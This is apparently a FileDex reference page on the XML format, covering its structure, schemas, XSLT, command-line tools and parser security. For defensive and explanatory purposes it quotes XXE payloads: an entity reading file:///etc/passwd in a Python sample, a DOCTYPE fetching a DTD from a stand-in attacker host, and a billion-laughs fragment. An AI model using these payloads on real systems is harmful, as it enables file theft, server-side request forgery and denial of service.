.XML Extensible Markup Language

XML encodes structured data as nested elements with attributes in human-readable, machine-parseable text. Standardized by the W3C in 1998, XML underpins document formats (DOCX, SVG), SOAP services, configuration files, and data interchange across enterprise systems.

File structure
Header: schema
Records: structured data
Markup Language · application/xml · W3C Standard · UTF-8 / UTF-16 · XSD / DTD · 1998
By FileDex
Not convertible

Markup format. XML transformation requires XSLT or schema-specific processing.

Common questions

What is the difference between well-formed and valid XML?

Well-formed XML follows syntax rules: proper nesting, quoted attributes, a single root element, and correct escaping. Valid XML is well-formed AND conforms to a schema (XSD, DTD, or RELAX NG) that defines allowed elements, attributes, and data types. A document can be well-formed but not valid.
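
As a rough illustration of the well-formedness half of that distinction, the sketch below uses Python's standard-library parser, which checks syntax only and does not validate against a schema (validity checks need a schema-aware library such as lxml). The function name and sample documents are hypothetical.

```python
import xml.etree.ElementTree as ET


def is_well_formed(text: str) -> bool:
    """Return True if the text parses as well-formed XML (syntax only)."""
    try:
        ET.fromstring(text)
        return True
    except ET.ParseError:
        return False


# Hypothetical sample documents.
good = '<order id="7"><item>pen</item></order>'
bad_nesting = "<order><item>pen</order></item>"  # tags closed in the wrong order
two_roots = "<a/><b/>"                           # more than one root element

for sample in (good, bad_nesting, two_roots):
    print(is_well_formed(sample), sample)
```

A document that passes this check can still be invalid if it uses elements or attributes its schema does not allow.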

Is XML still used or has JSON replaced it?

XML remains dominant in enterprise systems, regulated industries (healthcare HL7, finance FpML/XBRL), document formats (DOCX, SVG, RSS), and SOAP web services. JSON replaced XML primarily for REST APIs and browser-side data exchange. Both formats are actively used for different purposes.

What is an XXE attack and how do I prevent it?

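XXE (XML External Entity) injection abuses entity declarations in the DOCTYPE to read local files, trigger SSRF requests, or cause denial of service via entity expansion. Prevent it by disabling DTD processing or external entity resolution in your XML parser. In Python lxml: etree.XMLParser(resolve_entities=False, no_network=True). In Java, the strictest option is to forbid DOCTYPE declarations outright: factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true). Setting XMLConstants.FEATURE_SECURE_PROCESSING limits entity expansion but, depending on the parser implementation, may not block external entities on its own.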
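
One conservative approach, sketched here with only the Python standard library, is to refuse any document that contains a DOCTYPE at all before handing it to the real parser. The function name and the sample payload are hypothetical, and this is an illustration of the idea rather than a complete hardening recipe.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


def parse_without_doctype(text: str) -> ET.Element:
    """Parse XML, refusing any document that declares a DOCTYPE."""

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        # Called by expat as soon as it sees <!DOCTYPE ...>.
        raise ValueError("DOCTYPE declarations are not allowed")

    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = reject_doctype
    checker.Parse(text, True)  # raises ValueError on DOCTYPE, ExpatError on bad syntax
    return ET.fromstring(text)


# Hypothetical XXE payload that tries to read a local file.
xxe = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    "<foo>&xxe;</foo>"
)

print(parse_without_doctype("<foo>ok</foo>").text)
try:
    parse_without_doctype(xxe)
except ValueError as err:
    print("rejected:", err)
```

Rejecting the DOCTYPE also blocks entity-expansion attacks, at the cost of refusing legitimate documents that rely on a DTD.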

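Why does my XML parser reject control characters like null bytes or form feeds?

XML 1.0 forbids most ASCII control characters (0x00-0x08, 0x0B, 0x0C, 0x0E-0x1F) in all contexts, including CDATA sections and character references. Only tab (0x09), line feed (0x0A), and carriage return (0x0D) are allowed. Remove or replace the forbidden bytes before parsing. XML 1.1 permits 0x01-0x1F when written as character references (the null byte is never allowed), but it is rarely used.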
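
A minimal sketch of that clean-up step in Python follows. The helper name and sample input are hypothetical, and whether to delete or replace the offending characters depends on the data.

```python
import re
import xml.etree.ElementTree as ET

# Control characters that XML 1.0 forbids; tab, LF, and CR are left alone.
_FORBIDDEN = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f]")


def strip_forbidden_controls(text: str) -> str:
    """Delete characters that an XML 1.0 parser would reject."""
    return _FORBIDDEN.sub("", text)


# Hypothetical input containing a null byte and a vertical tab.
raw = "<note>line one\x00\x0b\tline two</note>"
clean = strip_forbidden_controls(raw)
root = ET.fromstring(clean)
print(repr(root.text))
```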

What makes .XML special

What is an XML file?

XML (Extensible Markup Language) is a markup language designed for storing and transporting structured data. The W3C published the first XML specification in 1998 as a simplified, human-readable alternative to SGML. Unlike HTML, XML has no predefined tags — developers define their own element names to match their data domain. This extensibility made XML the foundation for dozens of specialized formats still in use today.


XML is both human-readable and machine-parseable, making it suitable for configuration files, data exchange protocols, document formats, and web services. While JSON has replaced XML for many web API use cases, XML remains dominant in enterprise systems, document formats (DOCX, XLSX, SVG), and regulated industries.

How to open XML files

  • Any web browser — Built-in XML viewer with collapsible tree
  • VS Code (Windows, macOS, Linux) — Syntax highlighting, formatting, XML Schema validation
  • Notepad++ (Windows) — XML tree view with plugin
  • XMLSpy (Windows) — Professional XML editor with visual designers
  • IntelliJ IDEA / WebStorm — IDE-level XML support

Technical specifications

Property | Value
Standard | W3C Recommendation (XML 1.0, 1998; XML 1.1, 2004)
Encoding | UTF-8, UTF-16 (required); others declared in prolog
Validation | DTD, XSD (XML Schema), RELAX NG
Transformation | XSLT stylesheets transform XML to HTML, PDF, other XML
Querying | XPath expressions, XQuery language
MIME type | application/xml or text/xml

Common use cases

  • Configuration files: web.config (ASP.NET), pom.xml (Maven), AndroidManifest.xml
  • Data exchange: SOAP web services, EDI, financial messaging (FIX, FpML)
  • Document formats: DOCX, XLSX, PPTX, and ODT are ZIP archives containing XML files
  • Vector graphics: SVG (Scalable Vector Graphics) is XML
  • Syndication: RSS and Atom feeds are XML
  • Sitemaps: sitemap.xml files for search engine indexing

XML document structure

<?xml version="1.0" encoding="UTF-8"?>
<catalog>
  <product id="101">
    <name>Widget A</name>
    <price currency="USD">29.99</price>
    <inStock>true</inStock>
  </product>
</catalog>

The optional XML declaration (<?xml ... ?>) appears first. Elements must be properly nested and closed. Attributes appear inside opening tags. XML is case-sensitive (<Name> and <name> are different elements).
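
To show how that structure maps onto a parsed tree, here is a small sketch that reads the catalog document above with Python's standard library. The dictionary keys are illustrative choices, not part of any schema.

```python
import xml.etree.ElementTree as ET

CATALOG = b"""<?xml version="1.0" encoding="UTF-8"?>
<catalog>
  <product id="101">
    <name>Widget A</name>
    <price currency="USD">29.99</price>
    <inStock>true</inStock>
  </product>
</catalog>"""

root = ET.fromstring(CATALOG)

products = []
for product in root.findall("product"):
    price = product.find("price")
    products.append({
        "id": int(product.get("id")),            # attribute on <product>
        "name": product.findtext("name"),        # text of child element
        "price": float(price.text),
        "currency": price.get("currency"),       # attribute on <price>
        "in_stock": product.findtext("inStock") == "true",
    })

print(products)
# Element names are case-sensitive, so this lookup finds nothing.
print(root.find("Product"))
```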

XML vs JSON

Feature | XML | JSON
Comments | ✅ <!-- comment --> | ❌ Not supported
Attributes | ✅ Key-value on elements | ❌ No equivalent
Namespaces | ✅ (xmlns:) | ❌ Not supported
Schema validation | ✅ XSD, DTD | ✅ JSON Schema
Verbosity | More verbose | More concise
Browser parsing | Built-in DOMParser | Built-in JSON.parse

Validation with XML Schema (XSD)

XSD files define which elements, attributes, and data types are allowed in an XML document. Enterprise systems use XSD to validate incoming data before processing. An XML document is well-formed if it follows XML syntax rules, and valid if it conforms to its associated schema.

XSLT transformations

XSLT (XSL Transformations) stylesheets transform XML into other formats — HTML for display, different XML vocabularies for system integration, or plain text for reporting. XSLT is a declarative language that matches XML nodes with templates and outputs the transformed result. It remains widely used in publishing workflows and legacy enterprise integration.

.XML compared to alternatives

  • .XML vs .JSON, verbosity (JSON wins): JSON represents equivalent data in 30-50% fewer bytes by eliminating closing tags, attribute syntax, and namespace declarations.
  • .XML vs .JSON, schema validation (XML wins): XSD provides typed validation with inheritance, complex type definitions, and namespace-aware constraints. JSON Schema is capable but less mature for multi-namespace document validation.
  • .XML vs .JSON, comment support (XML wins): XML supports inline comments (<!-- ... -->). JSON has no comment syntax per RFC 8259.
  • .XML vs .YAML, enterprise adoption (XML wins): XML dominates regulated industries (finance, healthcare, government) with established standards like HL7, FpML, and XBRL. YAML is concentrated in DevOps and cloud-native tooling.

Technical reference

MIME Type: application/xml
Developer: World Wide Web Consortium (W3C)
Year Introduced: 1998
Open Standard: Yes

Binary Structure

XML is a text format, not binary. An XML document begins with an optional prolog: the XML declaration (<?xml version="1.0" encoding="UTF-8"?>) specifying version and character encoding, followed by an optional DOCTYPE declaration that references a DTD or contains inline entity definitions. The document body consists of a single root element containing nested child elements.

Elements are delimited by start tags (<tag>) and end tags (</tag>), with empty elements using self-closing syntax (<tag/>). Elements may carry attributes as name-value pairs within the start tag. Text content, CDATA sections (<![CDATA[...]]>), processing instructions (<?target data?>), and comments (<!-- ... -->) appear within or between elements. Namespaces use the xmlns attribute to partition element names into URI-identified vocabularies.

UTF-8 is the default encoding when none is declared; UTF-16 is also natively supported. Files may start with a UTF-8 BOM (EF BB BF) before the XML declaration, which the XML specification permits but does not require.

Well-formedness requires proper nesting, quoted attribute values, and a single root element. Validation against a schema (XSD, DTD, RELAX NG) enforces structural and type constraints beyond well-formedness.
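
The sketch below shows how namespaces and CDATA sections look once parsed, using Python's standard library. The Atom namespace URI is real. The http://example.com/ns vocabulary, the prefixes, and the sample content are made up for illustration.

```python
import xml.etree.ElementTree as ET

DOC = """<feed xmlns="http://www.w3.org/2005/Atom"
      xmlns:ex="http://example.com/ns">
  <title>Example</title>
  <ex:rating>5</ex:rating>
  <summary><![CDATA[Use <b> & </b> literally]]></summary>
</feed>"""

# Prefixes used in queries are local to this mapping; only the URIs must match.
NS = {"atom": "http://www.w3.org/2005/Atom", "ex": "http://example.com/ns"}

root = ET.fromstring(DOC)
print(root.tag)  # element names are stored in {namespace-uri}local-name form

title = root.findtext("atom:title", namespaces=NS)
rating = root.findtext("ex:rating", namespaces=NS)
summary = root.findtext("atom:summary", namespaces=NS)  # CDATA arrives as plain text

print(title, rating, summary)
# An unqualified lookup misses, because <title> lives in the Atom namespace.
print(root.find("title"))
```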

1996: W3C XML Working Group formed to create a simplified subset of SGML for the web
1998: XML 1.0 published as a W3C Recommendation, the first formal specification
1999: XSLT 1.0 and XPath 1.0 published, enabling declarative XML transformations
2001: XML Schema (XSD) 1.0 published, a typed validation language replacing DTDs for complex schemas
2004: XML 1.1 published, adding support for Unicode characters forbidden in XML 1.0 (control chars, new scripts)
2007: XQuery 1.0 and XSLT 2.0 published, mature query and transformation languages
2017: XSLT 3.0 published with streaming support for large-document transformation without full DOM loading

Validate XML well-formedness with xmllint
xmllint --noout input.xml

xmllint parses the file and reports well-formedness errors. The --noout flag suppresses the normal output of the parsed document, so only errors are printed. Exit code 0 means the document is well-formed; this command does not check it against a schema.

Validate XML against an XSD schema
xmllint --noout --schema schema.xsd input.xml

Validates the XML document against the specified XSD schema file. Reports both well-formedness and schema validation errors with line numbers.

Pretty-print (reformat) an XML file
xmllint --format input.xml > output.xml

Reformats XML with consistent indentation for readability. Useful for minified XML from APIs or machine-generated output.

Extract values with XPath via xmllint
xmllint --xpath '//product/name/text()' input.xml

Evaluates an XPath expression against the document and prints matching text nodes. Supports full XPath 1.0 syntax for querying element content, attributes, and structure.
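
For comparison, similar queries can be run from a script. The sketch below uses Python's standard-library ElementTree, which supports only a subset of XPath 1.0 (no text() function, for example), so the text is read from the matched elements instead. The sample data is hypothetical.

```python
import xml.etree.ElementTree as ET

root = ET.fromstring(
    "<catalog>"
    '<product id="101"><name>Widget A</name></product>'
    '<product id="102"><name>Widget B</name></product>'
    "</catalog>"
)

# All product names, the rough equivalent of //product/name/text().
names = [el.text for el in root.findall(".//product/name")]

# Attribute predicate: the name of the product whose id is 102.
widget_b = root.findtext(".//product[@id='102']/name")

# Attribute values of the direct <product> children.
ids = [p.get("id") for p in root.iterfind("product")]

print(names, widget_b, ids)
```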

Transform XML with XSLT via xsltproc
xsltproc transform.xslt input.xml > output.html

Applies an XSLT stylesheet to the input XML and writes the result. xsltproc supports XSLT 1.0 and EXSLT extensions. Installed by default on macOS and most Linux distributions.

XML to JSON (render, lossy): Web APIs have standardized on JSON. Converting XML responses from legacy SOAP services or government data feeds to JSON enables consumption by modern JavaScript/TypeScript frontends without an XML parser dependency.
XML to CSV (render, lossy): Tabular XML datasets from scientific instruments, financial feeds, and government open-data portals need flattening to CSV for import into spreadsheets and SQL databases.
XML to HTML (render, variable): XSLT transforms XML data into presentation-ready HTML for publishing workflows, documentation pipelines, and report generation without manual template coding.
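
To make the "lossy" label concrete, here is a rough sketch of an XML to JSON conversion in Python. The "@attribute" and "#text" key convention is an assumption loosely modeled on tools such as xmltodict, and the function name is hypothetical. Comments, mixed content, namespace prefixes, and the relative order of differently named siblings are not preserved.

```python
import json
import xml.etree.ElementTree as ET


def element_to_dict(el):
    """Convert an element to plain Python data (lossy by design)."""
    children = list(el)
    if not children and not el.attrib:
        return el.text                              # leaf element: just its text
    node = {f"@{k}": v for k, v in el.attrib.items()}
    for child in children:
        value = element_to_dict(child)
        if child.tag in node:                       # repeated tag becomes a list
            if not isinstance(node[child.tag], list):
                node[child.tag] = [node[child.tag]]
            node[child.tag].append(value)
        else:
            node[child.tag] = value
    if not children and el.text and el.text.strip():
        node["#text"] = el.text                     # text next to attributes
    return node


root = ET.fromstring(
    '<catalog><product id="101"><name>Widget A</name>'
    '<price currency="USD">29.99</price></product></catalog>'
)
result = {root.tag: element_to_dict(root)}
print(json.dumps(result, indent=2))
```

Every value comes out as a string, so numeric or boolean typing has to be applied separately, for example from a schema.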

Security risk level: HIGH

Attack Vectors

  • XXE (XML External Entity) injection — DOCTYPE entity declarations can reference local files (file:///etc/passwd), internal network URLs (SSRF), or parameter entities that exfiltrate data to attacker-controlled servers
  • Billion laughs attack — exponentially expanding entity definitions (<!ENTITY x10 '&x9;&x9;&x9;...') consume gigabytes of RAM from a few kilobytes of XML, causing denial of service
  • SSRF via external DTD — an XML document referencing an external DTD (<!DOCTYPE foo SYSTEM 'http://attacker.com/evil.dtd'>) causes the parser to fetch a remote resource, enabling server-side request forgery
  • XPath injection — user input concatenated into XPath expressions without sanitization allows authentication bypass and data extraction from XML datastores

Mitigation: FileDex processes XML files entirely in the browser. No external entity resolution, no DTD fetching, no server-side parsing. The browser's DOMParser runs in a sandboxed context with no filesystem or network access from parsed entities.

  • xmllint (tool): Command-line XML validator and formatter from libxml2, installed by default on macOS and most Linux distributions
  • xsltproc (tool): Command-line XSLT processor from libxslt that applies XSLT 1.0 stylesheets to XML documents
  • lxml (library): Python binding for libxml2/libxslt, offering fast XML/XSLT processing with XPath and schema validation
  • Saxon (tool): XSLT 3.0 / XQuery 3.1 processor, widely used for advanced XML transforms
  • xmltodict (library): Python library that converts XML to/from Python dicts, a simple XML-to-JSON bridge
  • fast-xml-parser (library): Fast XML to JSON/JS-object parser for Node.js with no native dependencies